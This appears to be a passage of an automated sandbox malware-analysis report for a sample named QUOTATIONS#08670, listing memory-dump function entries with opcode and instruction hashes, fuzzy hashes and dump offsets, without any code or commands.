                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5312ed0ddee46abc02f6467cd502236eead354b077657042fa7dc8db2d9c74b2
                                                          • Instruction ID: 5efdcab8d9f12a5e34d2dab30123c471b7736a16296d36f8ef09bcae48864563
                                                          • Opcode Fuzzy Hash: 5312ed0ddee46abc02f6467cd502236eead354b077657042fa7dc8db2d9c74b2
                                                          • Instruction Fuzzy Hash: 49B0923200430ECBC3003BA0FC0C0383BA8FE0438A3204031B30AC32309E601820CA5A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5e289dd3ecf95693f76e219c77bb9b87fe772a7bd70104c16ee134396005673
                                                          • Instruction ID: 5300d7d48dc7e358eee4c632ba5c5d77726b9e739a7d829e74b1d260fcbd4e3f
                                                          • Opcode Fuzzy Hash: e5e289dd3ecf95693f76e219c77bb9b87fe772a7bd70104c16ee134396005673
                                                          • Instruction Fuzzy Hash: 5D5198313086099FCB059F68D858A7A3BB2FF89310F1180A9FA06CB3A6CB75DD55CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef5bcdce9da02aff5e629767c048acc3d74da7b278a8e4639973a5e4acfe0462
                                                          • Instruction ID: 428e2bba4b8e5d261188aaf05072c0bf01aa7b995425ac5cda0908feafff2e1f
                                                          • Opcode Fuzzy Hash: ef5bcdce9da02aff5e629767c048acc3d74da7b278a8e4639973a5e4acfe0462
                                                          • Instruction Fuzzy Hash: C0412832B083848FCB05DF79A89069ABFB1EF81324B1985EBD548DB287D630D905C7A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 280efbe3929775e5b4aff8c75036f5b96bd5d99bf8bb5bdfa4576018d7a9f436
                                                          • Instruction ID: b810fd48f6122802e5f46c19ef38c3ce5cc6902bf6c539f29cc89731c4db5ef2
                                                          • Opcode Fuzzy Hash: 280efbe3929775e5b4aff8c75036f5b96bd5d99bf8bb5bdfa4576018d7a9f436
                                                          • Instruction Fuzzy Hash: D831257190C3958FC302ABB4D8A46697FB6FF52604F4985DBD2C9DB163CA384819C366
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3269c5c14517229461ed7be3ba73c3b46261f2f0effa7bebe9af97aa4c075747
                                                          • Instruction ID: 1b9c97570740239291e46af61c96f0abf7a93a0a25d240217a8dfb3cbfed18cd
                                                          • Opcode Fuzzy Hash: 3269c5c14517229461ed7be3ba73c3b46261f2f0effa7bebe9af97aa4c075747
                                                          • Instruction Fuzzy Hash: E621DE393143094BDB152E39C85477A2697FFD4718F28807AD646CB7A8EE29CC42D381
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0bba332059d2a9d2f67e7962eab86b0026bffee1151f12dd4f7c4d8f43adf99
                                                          • Instruction ID: 0d5f19c6fe0197e418568ca30a9a0a007bab38ef628f78a8bc908f53ff21fb21
                                                          • Opcode Fuzzy Hash: e0bba332059d2a9d2f67e7962eab86b0026bffee1151f12dd4f7c4d8f43adf99
                                                          • Instruction Fuzzy Hash: 7B21C134B002089FD704EF7998557AE7FE6FBC8710F248469E609EB398DB309D068B90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 924d414c697c15ea9c5c3cf1edc7dc1b875ba8cd01fbd721e2996c89afafb161
                                                          • Instruction ID: 66593a6dfadb5a9ae0681c1570ba5da83f4d398e2604637ba4e75a0e77b5571b
                                                          • Opcode Fuzzy Hash: 924d414c697c15ea9c5c3cf1edc7dc1b875ba8cd01fbd721e2996c89afafb161
                                                          • Instruction Fuzzy Hash: 15210675E483558FDF11AB7494282FE7BA2EF88211F14047ED846C7354EE744806CBC6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a9cc6e9484e05807c280ad004783fdabd13fbad049cb98daf3aa0f3b57ba1aa
                                                          • Instruction ID: fbfed971eba99ab665f6f5a4f1802cb30c776e3725a9595756e81d7b08cf2368
                                                          • Opcode Fuzzy Hash: 7a9cc6e9484e05807c280ad004783fdabd13fbad049cb98daf3aa0f3b57ba1aa
                                                          • Instruction Fuzzy Hash: 512122353086199BD7259B38D864A3EB7A2FFC975035581ADDA06CB3A4DF30DC06C781
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63b292c51ca88b1b53e828dc7e4008c1ac182216871f5e528d1816a1eaca3314
                                                          • Instruction ID: 03e80de042ec770ecdcbf29c355212930953654c81a53faa4b72a5bf81ee0f01
                                                          • Opcode Fuzzy Hash: 63b292c51ca88b1b53e828dc7e4008c1ac182216871f5e528d1816a1eaca3314
                                                          • Instruction Fuzzy Hash: 542168A164E3D24FD7039BB49C682A97F75AF43110B0A42E7D495CB1F3C6285C0AC363
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bde5949240a22f522d1393642b2c5806892d4859c8e30f49d7646f4f55c93ed
                                                          • Instruction ID: 642c34f7bf280f8e01b8624ccf3cc345b847f44f5508f331888aa59e6f58765a
                                                          • Opcode Fuzzy Hash: 7bde5949240a22f522d1393642b2c5806892d4859c8e30f49d7646f4f55c93ed
                                                          • Instruction Fuzzy Hash: 65210DB2909B9A0FC305837D889057E3FA1FF5232031A419AEA62DB3E3D620CC45C770
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bf1fde42c73ccd12bce3705204555232052272daf14823ca9fa5714dce6aa44
                                                          • Instruction ID: eea5f131ce78861154f2f095ab991fe1f31f14504b1cf14a68f57754fdee7d95
                                                          • Opcode Fuzzy Hash: 8bf1fde42c73ccd12bce3705204555232052272daf14823ca9fa5714dce6aa44
                                                          • Instruction Fuzzy Hash: C7216A70904614DFC304BBB8E898A7E7FB6FF89204F80899AD1C8E3264DE345805C363
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56737300ca76223d30e8f383f58ad3df08ecbf785d2efc87362156fbba8b95f4
                                                          • Instruction ID: 76a0b68e9be3f775d435b94f79da827f957a9b8b3e71d3d4dfe4334f771528fc
                                                          • Opcode Fuzzy Hash: 56737300ca76223d30e8f383f58ad3df08ecbf785d2efc87362156fbba8b95f4
                                                          • Instruction Fuzzy Hash: 6F2125B1504308DFDB05DF14D9C0B26BF65FB98318F21C569E8098B25AC736D816CAA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e58ce3db03ca83ceccf9f5f7300654563f3c2ea85be26fe6aa4b7da8838c0da2
                                                          • Instruction ID: c1359622d33a8505eb69476cdb4bf57708091dcb7fc1d8e01cafad0f7ad5b9fc
                                                          • Opcode Fuzzy Hash: e58ce3db03ca83ceccf9f5f7300654563f3c2ea85be26fe6aa4b7da8838c0da2
                                                          • Instruction Fuzzy Hash: 8C212971504304DFDB15DF14D5C0B26BB65FB84315F20C56DEC098B355C376E84ACA61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1a2e8428475bf9f25db1c78757412eb8600ed09cf446429e877e6e0ac37c415
                                                          • Instruction ID: 1db2c9f6922c553f90ec69cf27d4b0c4ecbd0c2a51f62723a03ada80a675a961
                                                          • Opcode Fuzzy Hash: b1a2e8428475bf9f25db1c78757412eb8600ed09cf446429e877e6e0ac37c415
                                                          • Instruction Fuzzy Hash: 5B21D075604704DFDB24DF14D984B26BB65FB88315F20C5A9EC0A8B296C33AD80BCA61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9e6215ce32eec72e4627806d591e46aacaf947eeb6c5ca541b037f184784e44
                                                          • Instruction ID: 8a82940c4c6be919b8ed79954fa0534df9a2c7f0d7eebc91aa08343cbd78c102
                                                          • Opcode Fuzzy Hash: f9e6215ce32eec72e4627806d591e46aacaf947eeb6c5ca541b037f184784e44
                                                          • Instruction Fuzzy Hash: 8821897191C341DFC301BB78D8A84397FB1FF86200F418EAAD4C983296DA34481AC797
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb9cb442beffde664aa63bd0ddb72bcb3b3cc4edbcb60a5694846e630c4ead28
                                                          • Instruction ID: 5be3b3eb09ff8e0e84956d928043e9e7b4b7ab458dd5ed5689c15a1fdbee5712
                                                          • Opcode Fuzzy Hash: eb9cb442beffde664aa63bd0ddb72bcb3b3cc4edbcb60a5694846e630c4ead28
                                                          • Instruction Fuzzy Hash: 7B21D23270560D9FDB049F64E818B7A37A1FB88324F148069FA05CB354DB74DE64CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fec2c29162ebedf860491115978b8fcdd37f7f2a63bc95041bab145df909bf7b
                                                          • Instruction ID: 3b2a1e0be9733a79870b9830e5e42caeb0c4e862e39f8363c27ff39df3bedd90
                                                          • Opcode Fuzzy Hash: fec2c29162ebedf860491115978b8fcdd37f7f2a63bc95041bab145df909bf7b
                                                          • Instruction Fuzzy Hash: 74117C3170560D9FDB14AF68E808A7A37A5FB88324F008069FA05CB358DF74DE65CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cafdc2a12e4332379b094eab6ea0124663227c1e520700fcc92429dd7165945a
                                                          • Instruction ID: 17dcfea8aa879252ad8712fd992825b5b1092758f8bab0abbf5b1104ed3557d3
                                                          • Opcode Fuzzy Hash: cafdc2a12e4332379b094eab6ea0124663227c1e520700fcc92429dd7165945a
                                                          • Instruction Fuzzy Hash: F6219F755097808FDB12CF24D994B15BF71FB46314F28C5EADC498B6A7C33A980ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                          • Instruction ID: e006839e92ff833bef3c81f8e9e5301f9df3a0cfd892692a8b807e9f2761acdf
                                                          • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                          • Instruction Fuzzy Hash: 0411AF76504344CFDB16CF10D5C4B16BF71FB94314F25C5A9E8094B256C336D85ACBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dac7d853be5722fed5115cd82b02e7cbdec0180878c9693d428d1ba661020af2
                                                          • Instruction ID: 1c98147db252964edc4f48e2ec0c457445c54638848711859af3dabd7360194d
                                                          • Opcode Fuzzy Hash: dac7d853be5722fed5115cd82b02e7cbdec0180878c9693d428d1ba661020af2
                                                          • Instruction Fuzzy Hash: 9D11A13174062CAFC325AF38E45097E7BE9FB887507114ABEE509D7369DB329C068B84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f54002ca93f3a4877e82e11a3db7cc23321ef43c1a27a9fc33b63c20600dd5e2
                                                          • Instruction ID: 514b5abbf9b047ee3a0e73627f218f9ff65eb79e1e758187a1e68cb0581000b9
                                                          • Opcode Fuzzy Hash: f54002ca93f3a4877e82e11a3db7cc23321ef43c1a27a9fc33b63c20600dd5e2
                                                          • Instruction Fuzzy Hash: C3012D34F4432A8BDF546BB4541C1BE7BE6AB88211B20093EE906D3344EE758D128BD6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                          • Instruction ID: 7ef07f24e751712f1d47c4d640c8bb5a343cb1d7ff712079172d82533dd9b1ef
                                                          • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                          • Instruction Fuzzy Hash: B1118B75504384DFDB16CF14D5C4B15BBA2FB84314F24C6ADDC498B696C33AE84ACB61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7ecd689901ae3bfccc3c4f8398c27c3cdfa15bc9aaf5c0974b6d4208f1341a7
                                                          • Instruction ID: 1deb65f0d85ad6cb602ea7dc0a96736d339773172d4bae18dc41684a0320b5c1
                                                          • Opcode Fuzzy Hash: c7ecd689901ae3bfccc3c4f8398c27c3cdfa15bc9aaf5c0974b6d4208f1341a7
                                                          • Instruction Fuzzy Hash: B201F27110430CAAE7208F1ACD84B77BFD8FF51324F18C82AEC098A286D2789800C6B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1fe7cf75f35d31a3af9ef99171bdee6d9fd520b2ae1285cb492f186aa2310eda
                                                          • Instruction ID: 5ccff1a1115d41fdaec761494224e32c10b935993a27a0bd6b45c9b7ef1a964e
                                                          • Opcode Fuzzy Hash: 1fe7cf75f35d31a3af9ef99171bdee6d9fd520b2ae1285cb492f186aa2310eda
                                                          • Instruction Fuzzy Hash: F2F06D313005184B87299A3E9848B3AB69EFFE8B557550069EA8ACB361DE21CC03C794
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 744066c6cc4fceec0318bf2f80543eb17e1d4596b1b51091fd05b1f6cbf41f7a
                                                          • Instruction ID: f8e2a809492f80f3d42cd9a4ff1fe734c0df35a121e070b931404f4eccc59bcb
                                                          • Opcode Fuzzy Hash: 744066c6cc4fceec0318bf2f80543eb17e1d4596b1b51091fd05b1f6cbf41f7a
                                                          • Instruction Fuzzy Hash: 24F0C271404348AAE7208E06C884B72FF98FF51324F18C85AED485B286C2789C44CAB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f9bbc0e6aa6467d9664f92a28c206d6c8b8b031cdb8f1155b576c402e39600b
                                                          • Instruction ID: 0af843063dc3b8d25b9fcb796d3606a9636209e54e390cd92368a74b778a9c62
                                                          • Opcode Fuzzy Hash: 7f9bbc0e6aa6467d9664f92a28c206d6c8b8b031cdb8f1155b576c402e39600b
                                                          • Instruction Fuzzy Hash: 05F04472D4535B8FCF00DBA8D815AEEBFB1EE96311F1085AAD614F7191E770168ACB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f295b1afee9c6b32cc192bcb99e93fc1233b13a4c5b45d23771de2afe9638d0
                                                          • Instruction ID: 847859041c67f0e91d16bdefc44b213af7a76b7357258e4c22b6546c40f6ec7f
                                                          • Opcode Fuzzy Hash: 6f295b1afee9c6b32cc192bcb99e93fc1233b13a4c5b45d23771de2afe9638d0
                                                          • Instruction Fuzzy Hash: F9F0C2B100C2858FD3035B31E8142A13F6AAF0211574A04CEE455875B7DA25E904CB12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1bde13aae50ed9f0db11e608b27ddb8e713845b307c74532985431bd15f36dc
                                                          • Instruction ID: 04bdb4bc2cff59f83e1d34a8be3335d646e069f8c038faa0396f3f777b3b6bc6
                                                          • Opcode Fuzzy Hash: d1bde13aae50ed9f0db11e608b27ddb8e713845b307c74532985431bd15f36dc
                                                          • Instruction Fuzzy Hash: 83E01231B802186BE30CD96E9D55F6776DABFC4B10F2884A9B209CF3A5DE61DC0107D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6f13e92c7509c3ed045fff3ba569c5fe9989689ad7b626e32dbee5397ed30c7
                                                          • Instruction ID: f0e6b622be60840af14fb170b9446af5157cc34dfb2d9f1b29246a8825286667
                                                          • Opcode Fuzzy Hash: d6f13e92c7509c3ed045fff3ba569c5fe9989689ad7b626e32dbee5397ed30c7
                                                          • Instruction Fuzzy Hash: 60E0C2340482C34FC703ABB4EA621A93F36ED8231075984A2F0810B53EEA70096FC321
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff07d7a6cfb156b9925ace3cf1748dd7b7c8334816dc3d0998a889f5a39908e3
                                                          • Instruction ID: 3d95810678ceaf325de65c5f02abf83b4470c3af99eb35d50248f4bc66a80ab7
                                                          • Opcode Fuzzy Hash: ff07d7a6cfb156b9925ace3cf1748dd7b7c8334816dc3d0998a889f5a39908e3
                                                          • Instruction Fuzzy Hash: 2FE017B0545601CFCB065F30F81C5753B7AFE4420A346446EF42683AB5DF35E500CB02
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae74b09858e08b8a4a773a99def470be14a7849ddb385124f92c19fb9c4360ff
                                                          • Instruction ID: 93e6643fdf3910871d7f9e19a0f596ae4b6b37663d90d5119dee35a320c0ded6
                                                          • Opcode Fuzzy Hash: ae74b09858e08b8a4a773a99def470be14a7849ddb385124f92c19fb9c4360ff
                                                          • Instruction Fuzzy Hash: 5FD0C23090020CEF8B00DFA4E90146CB7BBFB00304B0005A8E409D3214DB316F049780
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0b0db537d0de8b9873eae4d4fac114359cb6c1c0e9ae224fcead0f52bb1e964
                                                          • Instruction ID: 5768b8f640833d853a90ab5fa55f9d3a1091b651b1928a59dd35bb7036f70562
                                                          • Opcode Fuzzy Hash: b0b0db537d0de8b9873eae4d4fac114359cb6c1c0e9ae224fcead0f52bb1e964
                                                          • Instruction Fuzzy Hash: 9CD0673AB400189FCB04DF9DEC80CEDF776FB98321B048116E915A3261C7319925DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 173b45c0bbc0c41579e25dcb067c55322c6b33aacf61cd88c79dc9400c339fe8
                                                          • Instruction ID: 7d2089e5753078578726b72da44cacda316cc79fd558e168ee34de2592b7b3f5
                                                          • Opcode Fuzzy Hash: 173b45c0bbc0c41579e25dcb067c55322c6b33aacf61cd88c79dc9400c339fe8
                                                          • Instruction Fuzzy Hash: 0ED0125264EF981AE7139775742036AEAA15F91514F0944CBC0C54F1D3D8124A8AC34A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5c97aa31150f8dc2db678364f792c856461f6d2216de8fd809efd928bd58fa7
                                                          • Instruction ID: 873a4e7c8b7e35a4649b0b9812db4cb199fca4d310eaa22dd7260f7c5604ad48
                                                          • Opcode Fuzzy Hash: a5c97aa31150f8dc2db678364f792c856461f6d2216de8fd809efd928bd58fa7
                                                          • Instruction Fuzzy Hash: 29C0123414430B8AC701FB75F94661E373EFAC0310B509531B0090713DFFB4199D9691
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75beaef0cabef7406349cfddb2bed5176faedab8828d1b888bd49dbe5882cf8e
                                                          • Instruction ID: 674e2121da854ba39eb9436bfa097eac2cf0cb5317fda9c0ae6563e3418cc22f
                                                          • Opcode Fuzzy Hash: 75beaef0cabef7406349cfddb2bed5176faedab8828d1b888bd49dbe5882cf8e
                                                          • Instruction Fuzzy Hash: 13C0807E40B95587FF00C65098217757B15BF00349F0505FDDD559B581DE10DC11C641
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
